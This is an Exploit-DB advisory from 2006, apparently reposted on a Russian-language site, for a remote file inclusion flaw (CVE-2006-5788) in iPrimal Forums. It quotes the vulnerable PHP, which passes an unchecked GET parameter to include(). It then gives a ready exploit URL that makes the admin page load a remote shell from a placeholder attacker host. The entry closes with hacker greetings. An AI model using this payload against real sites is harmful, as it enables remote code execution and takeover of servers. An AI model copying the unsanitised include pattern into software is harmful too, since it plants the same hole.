- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2739
- Проверка EDB
-
- Пройдено
- Автор
- BL0OD3R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-5788
- Дата публикации
- 2006-11-08
Код:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
iPrimal Forums Remote File Inclusion
Download:http://ipigroup.org/downloads/forums.zip
Found by Bl0od3r
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code: #line 126-129
.....
if($_GET['p'] == ''){
echo 'Please select an item from the menu above.';
}else{
include($_GET['p'].'.php');
.....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected File:
/admin/index.php =]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability:
http://host.com/admin/index.php?p=http://evil.com/shell.txt?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz:evilcookie,eddy14,matrix_killer
Special Greetz to:str0ke!
# milw0rm.com [2006-11-08]- Источник
- www.exploit-db.com
